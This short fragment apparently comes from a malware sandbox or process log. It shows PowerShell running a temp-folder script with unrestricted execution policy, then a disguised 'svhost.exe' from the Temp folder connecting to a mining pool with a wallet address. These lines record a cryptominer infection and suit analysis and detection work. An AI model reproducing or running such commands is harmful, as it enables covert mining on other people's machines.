powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\tnn.ps1
840svhost.exe "C:\Users\test22\AppData\Local\Temp\svhost.exe" -d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL
2288